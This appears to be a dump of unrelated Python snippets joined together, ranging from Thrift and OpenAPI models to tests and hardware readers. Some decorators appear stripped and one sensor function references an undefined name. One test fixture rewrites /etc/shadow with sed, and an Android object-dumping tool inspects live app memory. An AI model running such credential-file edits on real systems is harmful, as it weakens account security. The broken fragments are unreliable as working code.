subprocess.run(command, shell=True, check=True, text=True, capture_output=True)
except subprocess.CalledProcessError as err:
adb_error_handler(err)
return True |
def extractThenthvoidWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class setOption_result():
thrift_spec = None
thrift_field_annotations = None
thrift_struct_annotations = None
def isUnion():
return False
def read(self, iprot):
if ((isinstance(iprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocol) and (iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL))) and isinstance(iprot.trans, TTransport.CReadableTransport) and (self.thrift_spec is not None) and (fastproto is not None)):
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0)
self.checkRequired()
return
if ((isinstance(iprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(iprot, THeaderProtocol.THeaderProtocol) and (iprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL))) and isinstance(iprot.trans, TTransport.CReadableTransport) and (self.thrift_spec is not None) and (fastproto is not None)):
fastproto.decode(self, iprot.trans, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2)
self.checkRequired()
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if (ftype == TType.STOP):
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
self.checkRequired()
def checkRequired(self):
return
def write(self, oprot):
if ((isinstance(oprot, TBinaryProtocol.TBinaryProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocol) and (oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_BINARY_PROTOCOL))) and (self.thrift_spec is not None) and (fastproto is not None)):
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=0))
return
if ((isinstance(oprot, TCompactProtocol.TCompactProtocolAccelerated) or (isinstance(oprot, THeaderProtocol.THeaderProtocol) and (oprot.get_protocol_id() == THeaderProtocol.THeaderProtocol.T_COMPACT_PROTOCOL))) and (self.thrift_spec is not None) and (fastproto is not None)):
oprot.trans.write(fastproto.encode(self, [self.__class__, self.thrift_spec, False], utf8strings=UTF8STRINGS, protoid=2))
return
oprot.writeStructBegin('setOption_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def __repr__(self):
L = []
padding = (' ' * 4)
return ('%s(\n%s)' % (self.__class__.__name__, ',\n'.join(L)))
def __eq__(self, other):
if (not isinstance(other, self.__class__)):
return False
return (self.__dict__ == other.__dict__)
def __ne__(self, other):
return (not (self == other))
if (not six.PY2):
__hash__ = object.__hash__ |
def manifest_paths(app_dir, flavours):
possible_manifests = [(Path(app_dir) / 'AndroidManifest.xml'), (Path(app_dir) / 'src/main/AndroidManifest.xml'), (Path(app_dir) / 'src/AndroidManifest.xml'), (Path(app_dir) / 'build.gradle'), (Path(app_dir) / 'build-extras.gradle'), (Path(app_dir) / 'build.gradle.kts')]
for flavour in flavours:
if (flavour == 'yes'):
continue
possible_manifests.append((((Path(app_dir) / 'src') / flavour) / 'AndroidManifest.xml'))
return [path for path in possible_manifests if path.is_file()] |
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
CONFIG = '\n nd_neighbor_timeout: 2\n max_resolve_backoff_time: 1\n interfaces:\n %(port_1)d:\n native_vlan: 100\n restricted_bcast_arpnd: true\n %(port_2)d:\n native_vlan: 100\n restricted_bcast_arpnd: true\n %(port_3)d:\n native_vlan: 100\n restricted_bcast_arpnd: true\n %(port_4)d:\n native_vlan: 100\n restricted_bcast_arpnd: true\n' |
def initialize():
global all_relocs
all_relocs = {}
for path in options.opts.reloc_addrs_paths:
if (not path.exists()):
continue
with path.open() as f:
sym_addrs_lines = f.readlines()
prog_bar = progress_bar.get_progress_bar(sym_addrs_lines)
prog_bar.set_description(f'Loading relocs ({path.stem})')
line: str
for (line_num, line) in enumerate(prog_bar):
line = line.strip()
line = line.split('//')[0]
line = line.strip()
if (line == ''):
continue
rom_addr = None
reloc_type = None
symbol_name = None
addend = None
for info in line.split(' '):
if (':' not in info):
continue
if (info.count(':') > 1):
log.parsing_error_preamble(path, line_num, line)
log.write(f"Too many ':'s in '{info}'")
log.error('')
(attr_name, attr_val) = info.split(':')
if (attr_name == ''):
log.parsing_error_preamble(path, line_num, line)
log.write(f"Missing attribute name in '{info}', is there extra whitespace?")
log.error('')
if (attr_val == ''):
log.parsing_error_preamble(path, line_num, line)
log.write(f"Missing attribute value in '{info}', is there extra whitespace?")
log.error('')
try:
if (attr_name == 'rom'):
rom_addr = int(attr_val, 0)
continue
if (attr_name == 'reloc'):
reloc_type = attr_val
continue
if (attr_name == 'symbol'):
symbol_name = attr_val
continue
if (attr_name == 'addend'):
addend = int(attr_val, 0)
continue
except:
log.parsing_error_preamble(path, line_num, line)
log.write(f"value of attribute '{attr_name}' could not be read:")
log.write('')
raise
if (rom_addr is None):
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'rom' attribute for reloc")
if (reloc_type is None):
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'reloc' attribute for reloc")
if (symbol_name is None):
log.parsing_error_preamble(path, line_num, line)
log.error(f"Missing required 'symbol' attribute for reloc")
reloc = Reloc(rom_addr, reloc_type, symbol_name)
if (addend is not None):
reloc.addend = addend
if (reloc.rom_address in all_relocs):
log.parsing_error_preamble(path, line_num, line)
log.error(f"Duplicated 'rom' address for reloc: 0x{reloc.rom_address:X}")
add_reloc(reloc) |
class OptionSeriesPolygonSonificationTracksMappingLowpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class TlsActivationResponse(ModelNormal):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
lazy_import()
return {'data': (TlsActivationResponseData,)}
_property
def discriminator():
return None
attribute_map = {'data': 'data'}
read_only_vars = {}
_composed_schemas = {}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') |
class Vhdl(Generator, Jinja2):
def __init__(self, rmap=None, path='regs.vhd', read_filler=0, interface='axil', **args):
super().__init__(rmap, **args)
self.path = path
self.read_filler = read_filler
self.interface = interface
def validate(self):
super().validate()
assert (self.interface in ['axil', 'apb', 'amm', 'lb']), ("Unknown '%s' interface!" % self.interface)
def generate(self):
self.validate()
j2_template = 'regmap_vhdl.j2'
j2_vars = {}
j2_vars['corsair_ver'] = __version__
j2_vars['rmap'] = self.rmap
j2_vars['module_name'] = utils.get_file_name(self.path)
j2_vars['read_filler'] = utils.str2int(self.read_filler)
j2_vars['interface'] = self.interface
j2_vars['config'] = config.globcfg
self.render_to_file(j2_template, j2_vars, self.path) |
def test_anomalous_all_columns_anomalies(test_id: str, dbt_project: DbtProject):
utc_today = datetime.utcnow().date()
(test_date, *training_dates) = generate_dates(base_date=(utc_today - timedelta(1)))
data: List[Dict[(str, Any)]] = [{TIMESTAMP_COLUMN: test_date.strftime(DATE_FORMAT), 'superhero': None} for _ in range(3)]
data += [{TIMESTAMP_COLUMN: cur_date.strftime(DATE_FORMAT), 'superhero': superhero} for cur_date in training_dates for superhero in ['Superman', 'Batman']]
test_results = dbt_project.test(test_id, DBT_TEST_NAME, DBT_TEST_ARGS, data=data, multiple_results=True)
col_to_status = {res['column_name'].lower(): res['status'] for res in test_results}
assert (col_to_status == {'superhero': 'fail', TIMESTAMP_COLUMN: 'pass'}) |
class wallBreakerForm(QDialog, Ui_Wallbreaker):
def __init__(self, parent=None):
super(wallBreakerForm, self).__init__(parent)
self.setupUi(self)
self.setWindowOpacity(0.93)
self.btnClassSearch.clicked.connect(self.classSearch)
self.btnClassDump.clicked.connect(self.classDump)
self.btnObjectSearch.clicked.connect(self.objectSearch)
self.btnObjectDump.clicked.connect(self.objectDump)
self.btnClearUI.clicked.connect(self.clearUi)
self.clearUi()
self.listClasses.itemClicked.connect(self.ClassItemClick)
self.txtClassName.textChanged.connect(self.changeClass)
self.classes = None
self.api = None
self._translate = QtCore.QCoreApplication.translate
def initData(self):
self.listClasses.clear()
for item in self.classes:
self.listClasses.addItem(item)
def ClassItemClick(self, item):
self.txtClassName.setText(item.text())
def changeClass(self, data):
if ((self.classes == None) or (len(self.classes) <= 0)):
return
self.listClasses.clear()
if (len(data) > 0):
for item in self.classes:
if (data in item):
self.listClasses.addItem(item)
else:
for item in self.classes:
self.listClasses.addItem(item)
def clearUi(self):
self.txtClassName.setText('')
self.txtSearchData.setPlainText('')
self.txtAddress.setText('')
def class_match(self, pattern):
return self.api.class_match(pattern)
def class_use(self, name):
return json.loads(self.api.class_use(name))
def object_get_classname(self, handle):
return self.api.object_get_class(handle)
def map_dump(self, handle, pretty_print=False, **kwargs):
result = "{}'s Map Entries {{".format(handle)
if pretty_print:
click.secho("{}'s Map Entries ".format(handle), fg='blue', nl=False)
click.secho('{', fg='red', nl=False)
pairs = self.api.map_dump(handle)
for key in pairs:
result += '\n\t{} => {}'.format(key, pairs[key])
if pretty_print:
click.secho('\n\t{}'.format(key), fg='blue', nl=False)
click.secho(' => ', nl=False)
click.secho(pairs[key], fg='bright_cyan', nl=False)
result += '\n}\n'
if pretty_print:
click.secho('\n}\n', fg='red', nl=False)
return result
def collection_dump(self, handle, pretty_print=False, **kwargs):
result = "{}'s Collection Entries {{".format(handle)
if pretty_print:
click.secho("{}'s Collection Entries ".format(handle), fg='blue', nl=False)
click.secho('{', fg='red', nl=False)
array = self.api.collection_dump(handle)
for i in range(0, len(array)):
result += '\n\t{} => {}'.format(i, array[i])
if pretty_print:
click.secho('\n\t{}'.format(i), fg='blue', nl=False)
click.secho(' => ', nl=False)
click.secho(array[i], fg='bright_cyan', nl=False)
result += '\n}\n'
if pretty_print:
click.secho('\n}\n', fg='red', nl=False)
return result
def object_get_field(self, handle, field, as_class=None):
return self.api.object_get_field(handle, field, as_class)
def object_search(self, clazz, stop=False):
return self.api.object_search(clazz, stop)
def object_dump(self, handle, as_class=None, **kwargs):
special_render = {'java.util.Map': self.map_dump, 'java.util.Collection': self.collection_dump}
handle = str(handle)
if (as_class is None):
as_class = self.object_get_classname(handle)
result = self.class_dump(as_class, handle=handle, **kwargs)
for clazz in special_render:
if (not self.api.instance_of(handle, clazz)):
continue
if (('pretty_print' in kwargs) and kwargs['pretty_print']):
click.secho('\n/* special type dump - {} */'.format(clazz), fg='bright_black')
result += special_render[clazz](handle, **kwargs)
return result
def class_dump(self, name, handle=None, pretty_print=False, short_name=True):
target = self.class_use(name)
result = ''
if pretty_print:
click.secho('')
class_name = str(target['name'])
if ('.' in class_name):
pkg = class_name[:class_name.rindex('.')]
class_name = class_name[(class_name.rindex('.') + 1):]
result += 'package {};\n\n'.format(pkg)
if pretty_print:
click.secho('package ', fg='blue', nl=False)
click.secho((pkg + '\n\n'), nl=False)
result += ('class {}'.format(class_name) + ' {\n\n')
if pretty_print:
click.secho('class ', fg='blue', nl=False)
click.secho(class_name, nl=False)
click.secho(' {\n\n', fg='red', nl=False)
def handle_fields(fields, can_preview=None):
_handle = handle
if (can_preview is None):
can_preview = (_handle is not None)
elif (can_preview and (_handle is None)):
_handle = target['name']
append = ''
original_class = (None if (handle is None) else self.object_get_classname(handle))
for field in fields:
try:
field = field[0]
t = DvmDescConverter(field['type'])
t = (t.short_name() if short_name else t.to_java())
append += '\t'
if pretty_print:
click.secho('\t', nl=False)
append += ('static ' if field['isStatic'] else '')
if pretty_print:
click.secho(('static ' if field['isStatic'] else ''), fg='blue', nl=False)
append += (t + ' ')
if pretty_print:
click.secho((t + ' '), fg='blue', nl=False)
value = None
if can_preview:
value = self.object_get_field(handle=_handle, field=field['name'], as_class=(name if (original_class and (original_class != name)) else None))
append += '{};{}\n'.format(field['name'], (' => {}'.format(value) if (value is not None) else ''))
if pretty_print:
click.secho(field['name'], fg='red', nl=False)
click.secho(';', nl=False)
if (value is not None):
click.secho(' => ', nl=False)
click.secho(value, fg='bright_cyan', nl=False)
click.secho('')
except:
append += '<unknown error>\n'
if pretty_print:
click.secho('<unknown error>', fg='red', nl=False)
click.secho()
append += '\n'
if pretty_print:
click.secho('\n', nl=False)
return append
static_fields = target['staticFields']
instance_fields = target['instanceFields']
result += '\t/* static fields */\n'
if pretty_print:
click.secho('\t/* static fields */', fg='black')
result += handle_fields(static_fields.values(), can_preview=True)
result += '\t/* instance fields */\n'
if pretty_print:
click.secho('\t/* instance fields */', fg='black')
result += handle_fields(instance_fields.values())
def handle_methods(methods):
append = ''
for method in methods:
try:
if short_name:
args_s = [DvmDescConverter(arg).short_name() for arg in method['arguments']]
else:
args_s = [DvmDescConverter(arg).to_java() for arg in method['arguments']]
args = ', '.join(args_s)
append += '\t'
if pretty_print:
click.secho('\t', nl=False)
append += ('static ' if method['isStatic'] else '')
if pretty_print:
click.secho(('static ' if method['isStatic'] else ''), fg='blue', nl=False)
retType = DvmDescConverter(method['retType'])
retType = (retType.short_name() if short_name else retType.to_java())
retType = ((retType + ' ') if (not method['isConstructor']) else '')
append += retType
if pretty_print:
click.secho(retType, fg='blue', nl=False)
append += (method['name'] + '(')
if pretty_print:
click.secho(method['name'], fg='red', nl=False)
click.secho('(', nl=False)
append += (args + ');\n')
if pretty_print:
for index in range(len(args_s)):
click.secho(args_s[index], fg='green', nl=False)
if (index is not (len(args_s) - 1)):
click.secho(', ', nl=False)
click.secho(');\n', nl=False)
except:
append += '<unknown error>({})\n'.format(method)
if pretty_print:
click.secho('<unknown error>({})'.format(method), fg='red', nl=False)
click.secho('')
return append
constructors = target['constructors']
instance_methods = target['instanceMethods']
static_methods = target['staticMethods']
result += '\t/* constructor methods */\n'
if pretty_print:
click.secho('\t/* constructor methods */', fg='black')
result += handle_methods(constructors)
result += '\n'
if pretty_print:
click.secho('')
result += '\t/* static methods */\n'
if pretty_print:
click.secho('\t/* static methods */', fg='black')
for name in static_methods:
result += handle_methods(static_methods[name])
result += '\n'
if pretty_print:
click.secho('')
result += '\t/* instance methods */\n'
if pretty_print:
click.secho('\t/* instance methods */', fg='black')
for name in instance_methods:
result += handle_methods(instance_methods[name])
result += '\n}\n'
if pretty_print:
click.secho('\n}\n', fg='red', nl=False)
return result
def appendLog(self, logstr):
self.txtSearchData.appendPlainText(logstr)
def classSearch(self):
className = self.txtClassName.text()
if (len(className) <= 0):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
return
if (self.api == None):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
return
instances = self.api.class_match(className)
self.appendLog('\n'.join(instances))
def classDump(self):
className = self.txtClassName.text()
if (len(className) <= 0):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
return
if (self.api == None):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
return
result = self.class_dump(className, pretty_print=False, short_name=True)
self.appendLog(result)
def objectSearch(self):
className = self.txtClassName.text()
if (len(className) <= 0):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
return
if (self.api == None):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
return
instances = self.object_search(className, stop=False)
for handle in instances:
self.appendLog('[{}]: {}'.format(handle, instances[handle]))
def objectDump(self):
className = self.txtClassName.text()
address = self.txtAddress.text()
if (len(address) <= 0):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', ''))
return
if (self.api == None):
QMessageBox().information(self, 'hint', self._translate('wallBreakerForm', 'api,'))
return
res = self.object_dump(int(address, 16), as_class=className, pretty_print=False, short_name=True)
self.appendLog(res) |
def setup_to_pass():
shutil.copy('/etc/default/useradd', '/etc/default/useradd.bak')
shutil.copy('/etc/shadow', '/etc/shadow.bak')
shellexec("sed -i '/INACTIVE/ s/=.*/=30/' /etc/default/useradd")
shellexec("sed -i -E '/(root|vagrant):/ s/0:99999:7::/0:99999:7:30:/' /etc/shadow")
(yield None)
shutil.move('/etc/default/useradd.bak', '/etc/default/useradd')
shutil.move('/etc/shadow.bak', '/etc/shadow') |
def downgrade():
op.create_table('stacks', sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False), sa.Column('name', sa.TEXT(), autoincrement=False, nullable=False), sa.Column('description', sa.TEXT(), autoincrement=False, nullable=True), sa.Column('requirements', sa.TEXT(), autoincrement=False, nullable=True), sa.PrimaryKeyConstraint('id', name='stacks_pkey'), sa.UniqueConstraint('name', name='stacks_name_key'))
op.create_table('stack_user_table', sa.Column('stack_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.ForeignKeyConstraint(['stack_id'], ['stacks.id'], name='stack_user_table_stack_id_fkey'), sa.ForeignKeyConstraint(['user_id'], ['users.id'], name='stack_user_table_user_id_fkey'))
op.create_table('stack_group_table', sa.Column('stack_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.Column('group_id', sa.INTEGER(), autoincrement=False, nullable=True), sa.ForeignKeyConstraint(['group_id'], ['groups.id'], name='stack_group_table_group_id_fkey'), sa.ForeignKeyConstraint(['stack_id'], ['stacks.id'], name='stack_group_table_stack_id_fkey'))
op.add_column('packages', sa.Column('stack_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.create_foreign_key('packages_stack_id_fkey', 'packages', 'stacks', ['stack_id'], ['id']) |
class DrQV2Builder(builders.ActorLearnerBuilder):
def __init__(self, config: drq_v2_config.DrQV2Config):
self._config = config
def make_replay_tables(self, environment_spec: specs.EnvironmentSpec, policy: drq_v2_networks.DrQV2PolicyNetwork) -> List[reverb.Table]:
del policy
samples_per_insert_tolerance = (self._config.samples_per_insert_tolerance_rate * self._config.samples_per_insert)
error_buffer = (self._config.min_replay_size * samples_per_insert_tolerance)
limiter = rate_limiters.SampleToInsertRatio(min_size_to_sample=self._config.min_replay_size, samples_per_insert=self._config.samples_per_insert, error_buffer=error_buffer)
replay_table = reverb.Table(name=self._config.replay_table_name, sampler=reverb.selectors.Uniform(), remover=reverb.selectors.Fifo(), max_size=self._config.max_replay_size, rate_limiter=limiter, signature=adders_reverb.NStepTransitionAdder.signature(environment_spec=environment_spec))
return [replay_table]
def make_dataset_iterator(self, replay_client: reverb.Client) -> Iterator[reverb.ReplaySample]:
dataset = datasets.make_reverb_dataset(table=self._config.replay_table_name, server_address=replay_client.server_address, batch_size=self._config.batch_size, prefetch_size=self._config.prefetch_size, transition_adder=True)
return dataset.as_numpy_iterator()
def make_adder(self, replay_client: reverb.Client, environment_spec: Optional[specs.EnvironmentSpec], policy: Optional[drq_v2_networks.DrQV2PolicyNetwork]) -> Optional[adders.Adder]:
del environment_spec, policy
return adders_reverb.NStepTransitionAdder(client=replay_client, n_step=self._config.n_step, discount=self._config.discount)
def make_actor(self, random_key: networks_lib.PRNGKey, policy: drq_v2_networks.DrQV2PolicyNetwork, environment_spec: specs.EnvironmentSpec, variable_source: Optional[core.VariableSource]=None, adder: Optional[adders.Adder]=None) -> core.Actor:
del environment_spec
assert (variable_source is not None)
device = None
variable_client = variable_utils.VariableClient(variable_source, 'policy', device=device)
variable_client.update_and_wait()
return acting_lib.DrQV2Actor(policy, random_key, variable_client=variable_client, adder=adder, backend=device)
def make_learner(self, random_key: networks_lib.PRNGKey, networks: drq_v2_networks.DrQV2Networks, dataset: Iterator[reverb.ReplaySample], logger_fn: loggers.LoggerFactory, environment_spec: specs.EnvironmentSpec, replay_client: Optional[reverb.Client]=None, counter: Optional[counting.Counter]=None) -> learning_lib.DrQV2Learner:
del replay_client, environment_spec
config = self._config
critic_optimizer = optax.adam(config.learning_rate)
policy_optimizer = optax.adam(config.learning_rate)
encoder_optimizer = optax.adam(config.learning_rate)
(sigma_start, sigma_end, sigma_schedule_steps) = config.sigma
observations_per_step = int((config.batch_size / config.samples_per_insert))
if hasattr(config, 'min_observations'):
min_observations = config.min_observations
else:
min_observations = config.min_replay_size
sigma_schedule = (lambda step: optax.linear_schedule(sigma_start, sigma_end, sigma_schedule_steps)(((step + max(min_observations, config.batch_size)) * observations_per_step)))
return learning_lib.DrQV2Learner(random_key=random_key, dataset=dataset, networks=networks, sigma_schedule=sigma_schedule, policy_optimizer=policy_optimizer, critic_optimizer=critic_optimizer, encoder_optimizer=encoder_optimizer, augmentation=config.augmentation, critic_soft_update_rate=config.critic_q_soft_update_rate, discount=config.discount, noise_clip=config.noise_clip, logger=logger_fn('learner'), counter=counter) |
def load_tests():
if (fold_tests or verifier_failures):
return
for name in ['test_string_functions.toml', 'test_folding.toml', 'test_optimizer.toml']:
data = eql.load_dump(eql.etc.get_etc_path(name))
for (test_name, contents) in sorted(data.items()):
test_name = '{file}:{test}'.format(file=name, test=test_name)
case_settings = []
if (('case_sensitive' not in contents) and ('case_insensitive' not in contents)):
case_sensitive = True
case_insensitive = True
else:
case_sensitive = (contents.get('case_sensitive') is True)
case_insensitive = (contents.get('case_insensitive') is True)
if case_sensitive:
case_settings.append(True)
if case_insensitive:
case_settings.append(False)
assert (len(case_settings) > 0), '{test} is missing case_sensitive/case_insensitive'.format(test=test_name)
extract_tests(test_name, contents, case_settings) |
.slow_integration_test
def test_clone_subgroup_exclude_archived():
os.environ['GITLAB_URL'] = '
output = io_util.execute(['-p', '--print-format', 'json', '-a', 'exclude'], 60)
obj = json.loads(output)
assert (obj['children'][0]['name'] == 'Group Test')
assert (obj['children'][0]['children'][0]['name'] == 'Subgroup Test')
assert (len(obj['children'][0]['children'][0]['children']) == 2)
assert (obj['children'][0]['children'][0]['children'][0]['name'] == 'gitlab-project-submodule')
assert (obj['children'][0]['children'][0]['children'][1]['name'] == 'gitlabber-sample-submodule') |
def iter_slices(table, other, mode: str, keep_empty: bool):
for (_c, bin_rows, src_rows) in by_shared_chroms(other, table, keep_empty):
if (src_rows is None):
for _ in range(len(bin_rows)):
(yield pd.Index([], dtype='int64'))
else:
for (slc, _s, _e) in idx_ranges(src_rows, bin_rows.start, bin_rows.end, mode):
indices = src_rows.index[slc].values
if (keep_empty or len(indices)):
(yield indices) |
class ACLMixin(object):
_attr
def permissions(cls):
secondary_table = create_secondary_table(cls.__name__, 'Permission', cls.__tablename__, 'Permissions')
return relationship('Permission', secondary=secondary_table)
('permissions')
def _validate_permissions(self, key, permission):
from stalker.models.auth import Permission
if (not isinstance(permission, Permission)):
raise TypeError(('%s.permissions should be all instances of stalker.models.auth.Permission not %s' % (self.__class__.__name__, permission.__class__.__name__)))
return permission
def __acl__(self):
return [(perm.access, ('%s:%s' % (self.__class__.__name__, self.name)), ('%s_%s' % (perm.action, perm.class_name))) for perm in self.permissions] |
class CmdReset(COMMAND_DEFAULT_CLASS):
key = ''
aliases = ['']
locks = 'cmd:perm(reload) or perm(Developer)'
help_category = 'System'
def func(self):
evennia.SESSION_HANDLER.announce_all(' Server resetting/restarting ...')
evennia.SESSION_HANDLER.portal_reset_server() |
class ThermoEntity():
def __init__(self, busnum=0, devnum=0, dtype=6675):
self.busy = False
self.initialized = False
self.busnum = int(busnum)
self.devnum = int(devnum)
self.values = 0
try:
self.spi = spidev.SpiDev()
self.spi.open(self.busnum, self.devnum)
self.spi.max_speed_hz = 3900000
self.initialized = True
except Exception as e:
self.initialized = False
self.devnum = (- 1)
self.busnum = (- 1)
self.spi = None
if (dtype == 6675):
self.read = self.read6675
elif (dtype == 31855):
self.read = self.read31855
else:
self.read = self.readDummy
self.initialized = False
def readDummy(self):
return None
def read6675(self):
val = self.values
try:
if self.busy:
time.sleep(0.1)
if (self.busy == False):
self.busy = True
rawData = self.spi.readbytes(2)
val = ((((rawData[0] << 8) | rawData[1]) >> 3) * 0.25)
self.busy = False
self.values = val
except Exception as e:
self.busy = False
val = (- 1)
return val
def read31855(self):
val = self.values
try:
if self.busy:
time.sleep(0.1)
if (self.busy == False):
self.busy = True
rawData = self.spi.readbytes(4)
val = ((rawData[0] << 8) | RawData[1])
if (val & 1):
return None
val >>= 2
if (val & 8192):
val -= 16384
self.busy = False
self.values = val
except Exception as e:
self.busy = False
val = (- 1)
return val |
def test():
assert ((len(doc1.ents) == 2) and (len(doc2.ents) == 2) and (len(doc3.ents) == 2)), 'Attendu deux entites pour tous les exemples'
assert any((((e.label_ == 'PER') and (e.text == 'PewDiePie')) for e in doc2.ents)), 'As-tu utilise le label pour PER correctement ?'
assert any((((e.label_ == 'PER') and (e.text == 'Alexis Ohanian')) for e in doc3.ents)), 'As-tu utilise le label pour PER correctement ?'
__msg__.good('Bien joue ! Apres avoir inclus les deux exemples des nouvelles entites SITE_WEB, ainsi que des entites existantes telles que PER, le modele est maintenant beaucoup plus performant.') |
class TestAllowEventWithoutTransition():
def test_send_unknown_event(self, classic_traffic_light_machine):
sm = classic_traffic_light_machine(allow_event_without_transition=True)
assert sm.green.is_active
sm.send('unknow_event')
assert sm.green.is_active
def test_send_not_valid_for_the_current_state_event(self, classic_traffic_light_machine):
sm = classic_traffic_light_machine(allow_event_without_transition=True)
assert sm.green.is_active
sm.stop()
assert sm.green.is_active |
class OptionPlotoptionsWaterfallSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def GetNormal(kwargs: dict) -> OutgoingMessage:
compulsory_params = ['id']
optional_params = ['width', 'height', 'fov', 'intrinsic_matrix']
utility.CheckKwargs(kwargs, compulsory_params)
msg = OutgoingMessage()
msg.write_int32(kwargs['id'])
msg.write_string('GetNormal')
if ('intrinsic_matrix' in kwargs):
msg.write_bool(True)
msg.write_float32_list(kwargs['intrinsic_matrix'])
else:
msg.write_bool(False)
msg.write_int32(kwargs['width'])
msg.write_int32(kwargs['height'])
if ('fov' in kwargs):
msg.write_float32(kwargs['fov'])
else:
msg.write_float32(60)
return msg |
(name='api.vm.snapshot.tasks.vm_snapshot_cb', base=MgmtCallbackTask, bind=True)
(error_fun=_vm_snapshot_cb_alert)
def vm_snapshot_cb(result, task_id, vm_uuid=None, snap_id=None):
snap = Snapshot.objects.select_related('vm').get(id=snap_id)
vm = Vm.objects.get(uuid=vm_uuid)
action = result['meta']['apiview']['method']
msg = result.get('message', '')
